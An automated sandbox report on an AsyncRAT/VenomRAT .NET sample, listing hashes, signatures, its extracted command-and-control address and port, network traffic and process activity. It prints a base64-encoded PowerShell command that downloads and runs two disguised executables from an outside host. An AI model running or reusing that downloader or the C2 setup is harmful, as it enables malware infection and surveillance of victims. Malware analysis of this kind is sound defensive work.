Windows Analysis Report
0pF5Vz4xG4.exe

Overview

General Information

Sample name: 0pF5Vz4xG4.exe
renamed because original name is a hash value
Original sample name: 850932bf796d17da05dc8c531993db6423b56686ff7dc68cc0a802e87f827fad.exe
Analysis ID: 1447642
MD5: 769a1873247d5024808cf7bd70555b01
SHA1: 2e55be1191affa933438890fc34eb31136bef045
SHA256: 850932bf796d17da05dc8c531993db6423b56686ff7dc68cc0a802e87f827fad
Tags: exe, venomrat

Detection

AsyncRAT
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AsyncRAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file does not import any functions
Sample file is different than original file name gathered from version info
Yara signature match

Classification

Name: AsyncRAT
Description: AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool; however, it could also be used maliciously because it provides functionality such as a keylogger, remote desktop control, and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kits and other techniques.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

AV Detection

Source: 0pF5Vz4xG4.exe Malware Configuration Extractor: AsyncRAT {"Ports": ["4449"], "Server": ["94.156.65.172"], "Certificate": "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", "Server Signature": "kqqmqcHW+lrfDFUM+L+OdEMYusuLLkWntK3q1MWb1AnedZMdr2oAlXEGkreKRl0JNVwhdGMQgoNPJLnKDu9Nux3mwulmhQchyeUxqfxX5H8M87MqPLcXnKblAMoa8m+VyRGCVFn59iBwizEj16DMiLuv1h27Dkx3yjZaVlktefI="}
Source: 0pF5Vz4xG4.exe Virustotal: Detection: 50% Perma Link
Source: Submitted Sample Integrated Neural Analysis Model: Matched 78.3% probability
Source: 0pF5Vz4xG4.exe Joe Sandbox ML: detected
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 HTTP Parser: No favicon
Source: unknown HTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49796 version: TLS 1.2
Source: 0pF5Vz4xG4.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Joe Sandbox View IP Address: 13.107.246.45 13.107.246.45
Source: Joe Sandbox View IP Address: 13.107.246.60 13.107.246.60
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: global traffic HTTP traffic detected:
    GET /mscc/lib/v2/wcp-consent.js HTTP/1.1
    Host: wcpstatic.microsoft.com
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: */*
    Sec-Fetch-Site: same-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: script
    Referer: https://learn.microsoft.com/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected:
    GET /scripts/c/ms.jsll-3.min.js HTTP/1.1
    Host: js.monitor.azure.com
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: */*
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: script
    Referer: https://learn.microsoft.com/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected:
    GET /fs/windows/config.json HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Encoding: identity
    If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
    Range: bytes=0-2147483646
    User-Agent: Microsoft BITS/7.8
    Host: fs.microsoft.com
Source: global traffic HTTP traffic detected:
    GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=C2sHvMB2cv7dmAa&MD=lE+CS+hL HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
    Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected:
    GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=C2sHvMB2cv7dmAa&MD=lE+CS+hL HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
    Host: slscr.update.microsoft.com
Source: chromecache_101.5.dr String found in binary or memory: href="https://www.linkedin.com/cws/share?url=${encodeURIComponent(e)}&text=${encodeURIComponent(aS.replace("{credentialName}",t.title))}" equals www.linkedin.com (Linkedin)
Source: chromecache_101.5.dr String found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
Source: chromecache_101.5.dr String found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
Source: chromecache_101.5.dr String found in binary or memory: </div>`}function mCe(t){return t.authenticationModes?t.authenticationModes.map(e=>e.type).includes("MSA"):!1}function fCe(t){let e=t.authenticationModes.find(o=>o.type==="MSA");return e?e.upn:null}function gCe(t){let e=t.authenticationModes.find(o=>o.type==="AAD");return e?e.upn:null}function hCe(t,e,o){return e??(Qt(t.email)?o:t.email)??""}function Dre(t){let e=mCe(t),o=e?fCe(t):null,n=e?null:gCe(t),r=hCe(t,o,n);return[e,r]}function bCe(t,e){let[o,n]=Dre(e);if(o){let i=t.querySelector("#report-msa-email-account");i.innerText=n}let r=t.querySelector("#opt-into-email-checkbox"),s=t.querySelector("#submitter-info");r.addEventListener("change",()=>{r.checked?s.hidden=!1:s.hidden=!0})}function _Ce(t){if(!t)return;let e=t.querySelector("#select-reason"),o=t.querySelector("#other-reason-textarea-container"),n=o.querySelector("textarea");!e||!o||!n||(e.value==="Other"&&(o.hidden=!1,n.required=!0),e.addEventListener("change",()=>{e.value==="Other"||e.value==="14"?(o.hidden=!1,n.required=!0,n.disabled=!1):(o.hidden=!0,n.required=!1,n.disabled=!0)}))}var Wt;function $re(){let t=document.getElementById("share-to-linkedin-profile");t&&t.addEventListener("click",e=>{let o=e.currentTarget,n=JSON.parse(o.dataset.credential),r=document.createElement("div"),s=vCe(n);S(s,r),Wt=new xe(r),Wt.show();let i=document.getElementById("share-to-feed-button"),a=document.getElementById("linkedin-feed-message"),l=new URL(decodeURI(i.getAttribute("href")));a.onchange=()=>{l.searchParams.set("text",a.value),i.setAttribute("href",l.toString())}})}function vCe(t){let e=encodeURI(`https://${location.host}/api/credentials/share/${_.data.userLocale}/${R.userName}/${t?.credentialId}?sharingId=${R.sharingId}`),o=1035,n=i=>new Date(i).getFullYear(),r=i=>new Date(i).getMonth()+1,s=encodeURI(`https://www.linkedin.com/profile/add?startTask=CERTIFICATION_NAME&name=${t.title}&organizationId=${o}&issueYear=${n(t.awardedOn)}&issueMonth=${r(t.awardedOn)}&expirationYear=${t.expiresOn?n(t.expiresOn):""}&expirationMonth=${t.expiresOn?r(t.expiresOn):""}&certUrl=${e}&certId=${t.credentialId}&skills=${t.skills?`${t.skills.map(i=>encodeURIComponent(i)).join(",")}`:""}`);return m` equals www.linkedin.com (Linkedin)
Source: chromecache_101.5.dr String found in binary or memory: </section>`}function Xne(t=dx,e=xd){return Aa(rH,t,e)}function ere(t=bx,e=gx){return Aa(E2,t,e)}var yA=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(yA||{}),nEe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function hy(t,e,o){let n=encodeURIComponent(e),r=new URL(t);r.hostname="learn.microsoft.com";let s=r.href+=(t.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=R.sharingId?`&sharingId=${R.sharingId}`:"";return Object.values(yA).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let u=encodeURIComponent(s+c+i),d=o?.achievementCopyTitle?.overrideTitle??e,p=encodeURIComponent($9.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${d}`:`"${d}"`)),f={achievementCopy:p,url:u,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
Source: chromecache_101.5.dr String found in binary or memory: </section>`}function Xne(t=dx,e=xd){return Aa(rH,t,e)}function ere(t=bx,e=gx){return Aa(E2,t,e)}var yA=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(yA||{}),nEe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function hy(t,e,o){let n=encodeURIComponent(e),r=new URL(t);r.hostname="learn.microsoft.com";let s=r.href+=(t.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=R.sharingId?`&sharingId=${R.sharingId}`:"";return Object.values(yA).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let u=encodeURIComponent(s+c+i),d=o?.achievementCopyTitle?.overrideTitle??e,p=encodeURIComponent($9.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${d}`:`"${d}"`)),f={achievementCopy:p,url:u,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
Source: chromecache_101.5.dr String found in binary or memory: </section>`}function Xne(t=dx,e=xd){return Aa(rH,t,e)}function ere(t=bx,e=gx){return Aa(E2,t,e)}var yA=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(yA||{}),nEe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function hy(t,e,o){let n=encodeURIComponent(e),r=new URL(t);r.hostname="learn.microsoft.com";let s=r.href+=(t.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=R.sharingId?`&sharingId=${R.sharingId}`:"";return Object.values(yA).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let u=encodeURIComponent(s+c+i),d=o?.achievementCopyTitle?.overrideTitle??e,p=encodeURIComponent($9.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${d}`:`"${d}"`)),f={achievementCopy:p,url:u,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)
Source: global traffic DNS traffic detected: DNS query: js.monitor.azure.com
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: mdec.nelreports.net
Source: chromecache_101.5.dr String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chromecache_101.5.dr String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chromecache_101.5.dr String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chromecache_101.5.dr String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chromecache_85.5.dr String found in binary or memory: http://schema.org/Organization
Source: chromecache_85.5.dr String found in binary or memory: https://aka.ms/ContentUserFeedback
Source: chromecache_101.5.dr String found in binary or memory: https://aka.ms/MSBuildChallenge/T1?ocid=build24_csc_learnpromo_T1_cnl
Source: chromecache_101.5.dr String found in binary or memory: https://aka.ms/banner_mslearn_tier1?wt.mc_id=build24_t1_learnpromotion_events
Source: chromecache_101.5.dr String found in binary or memory: https://aka.ms/certhelp
Source: chromecache_85.5.dr, chromecache_75.5.dr, chromecache_106.5.dr String found in binary or memory: https://aka.ms/feedback/report?space=61
Source: chromecache_101.5.dr String found in binary or memory: https://aka.ms/pshelpmechoose
Source: chromecache_85.5.dr String found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
Source: chromecache_85.5.dr String found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
Source: chromecache_85.5.dr String found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
Source: chromecache_101.5.dr String found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
Source: chromecache_101.5.dr String found in binary or memory: https://channel9.msdn.com/
Source: chromecache_101.5.dr String found in binary or memory: https://github.com/$
Source: chromecache_85.5.dr String found in binary or memory: https://github.com/Thraka
Source: chromecache_85.5.dr String found in binary or memory: https://github.com/Youssef1313
Source: chromecache_85.5.dr String found in binary or memory: https://github.com/adegeo
Source: chromecache_85.5.dr String found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
Source: chromecache_85.5.dr String found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
Source: chromecache_85.5.dr String found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
Source: chromecache_85.5.dr String found in binary or memory: https://github.com/dotnet/docs/issues
Source: chromecache_85.5.dr String found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
Source: chromecache_101.5.dr String found in binary or memory: https://github.com/dotnet/try
Source: chromecache_85.5.dr String found in binary or memory: https://github.com/gewarren
Source: chromecache_101.5.dr String found in binary or memory: https://github.com/jonschlinkert/is-plain-object
Source: chromecache_101.5.dr String found in binary or memory: https://github.com/js-cookie/js-cookie
Source: chromecache_85.5.dr String found in binary or memory: https://github.com/mairaw
Source: chromecache_85.5.dr String found in binary or memory: https://github.com/nschonni
Source: chromecache_85.5.dr String found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-3.min.js
Source: chromecache_101.5.dr String found in binary or memory: https://learn-video.azurefd.net/
Source: chromecache_101.5.dr String found in binary or memory: https://learn-video.azurefd.net/vod/player
Source: chromecache_101.5.dr String found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
Source: chromecache_101.5.dr String found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2017-0
Source: chromecache_101.5.dr String found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
Source: chromecache_101.5.dr String found in binary or memory: https://octokit.github.io/rest.js/#throttling
Source: chromecache_101.5.dr String found in binary or memory: https://schema.org
Source: chromecache_101.5.dr String found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
Source: chromecache_101.5.dr String found in binary or memory: https://www.linkedin.com/cws/share?url=$
Source: chromecache_101.5.dr String found in binary or memory: https://www.linkedin.com/profile/add?startTask=CERTIFICATION_NAME&name=$
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match File source: 0pF5Vz4xG4.exe, type: SAMPLE
Source: Yara match File source: 0.0.0pF5Vz4xG4.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 0pF5Vz4xG4.exe PID: 7156, type: MEMORYSTR
Source: 0pF5Vz4xG4.exe, Keylogger.cs .Net Code: KeyboardLayout

System Summary

Source: 0pF5Vz4xG4.exe, type: SAMPLE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.0.0pF5Vz4xG4.exe.b70000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0pF5Vz4xG4.exe Static PE information: No import functions for PE file found
Source: 0pF5Vz4xG4.exe, 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameClientx64.exe" vs 0pF5Vz4xG4.exe
Source: 0pF5Vz4xG4.exe Binary or memory string: OriginalFilenameClientx64.exe" vs 0pF5Vz4xG4.exe
Source: 0pF5Vz4xG4.exe, type: SAMPLE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.0.0pF5Vz4xG4.exe.b70000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0pF5Vz4xG4.exe, Program.cs Base64 encoded string: 'L2MgcG93ZXJzaGVsbCAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwOi8veGN1LmV4Z2FtaW5nLmNsaWNrJywgJyVUZW1wJVxcRXhwSW9yZXIuZXhlJykgJiBwb3dlcnNoZWxsIChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly94Y3U1LmV4Z2FtaW5nLmNsaWNrJywgJyVUZW1wJVxcRXhwbElvcmVyLmV4ZScpICYgcG93ZXJzaGVsbCBTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAnJVRlbXAlXFxFeHBJb3Jlci5leGUnICYgcG93ZXJzaGVsbCBTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAnJVRlbXAlXFxFeHBsSW9yZXIuZXhlJyAmIGV4aXQ='
Source: 0pF5Vz4xG4.exe, Settings.cs Base64 encoded string: 'jXkAxQKdxWdKf6MulZtlNYU6T4qEdxLMPLu5+y70FwxaPzWHBOZsjaBJqdi8N/R7QrkuvKKrnqzxiMRLwavn3Q==', 'ozEtu3hRDvdntQ14K2rVsFw+W+1ePWsKMq82RBY/lS5QZlGsUkLLNq6N4B85bGE4caoqd/pKC2NTiNKftn85/w==', 'lJWcKE/WisnnPmk/afSaGnNNWfh3Z1YjCbaMyzuNbOE+WU7HqgcR1+ArYpqJRCnepG1be7lg2FIqcKZYCej1yMmak+W9vHZrWTyH9wbaX3JiSbBxIrmOeyHtSIOmoUc1', 'y/3x+hsSnm+9ccbUAPkqO4rO8Ux4onUjfKbe0vO0M8YdZNCXg74/pUCReRIf5KErux32JKbTqEuKL6x1UM4q9g==', 'PcwdjTKFAMgG3RHtaI7nTq63q8Eo8JQXLND55HmnBxDj7yCNlO/tUriInA85OeRIhQX6AJLdBKvLVtbRZKanDwGvA/WyTk/9TuqreAY49jM=', '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', 'KiKGTpI4rxj6QQT4E4kJI+SnHTdj1UbcJmKNvHjX6/DBF5p7yJFVfH4I9rkp7syoYn0OxqslJ86j9Abh7e7AhA==', 'vbGJqivXh6TY//32e3NkAMsK3inu7RLf9cK35T1C/AkMmT/TUmcHpChY9BLfk3lm2ySPPE2tirk820n/Furu8w==', 'qo/SK2p+f/Zfm9FtCYaV5XME0G3kCCAfriHdDkUi5OOlp5Cb7AN6CJsVHGFTdrhSAj5VDDwIGV+NEtnIkznSXA==', 'l7knJCzKqw68RMnowgrOjgqCjO54idsEdj2eVkR1Cn8iMS8wSYPjDI68uHet/iIWFCCjtVs15M5kVusbV3iyLw=='
Source: classification engine Classification label: mal96.troj.spyw.evad.winEXE@25/59@8/5
Source: 0pF5Vz4xG4.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0pF5Vz4xG4.exe Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 0pF5Vz4xG4.exe Virustotal: Detection: 50%
Source: unknown Process created: C:\Users\user\Desktop\0pF5Vz4xG4.exe "C:\Users\user\Desktop\0pF5Vz4xG4.exe"
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1556 --field-trial-handle=2072,i,2833464812255304590,11198771505965286401,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1928,i,15172110000776622718,9297871655836015958,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1556 --field-trial-handle=2072,i,2833464812255304590,11198771505965286401,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1928,i,15172110000776622718,9297871655836015958,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: ieframe.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: mlang.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: policymanager.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: msvcp110_win.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: ieframe.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: winhttp.dll
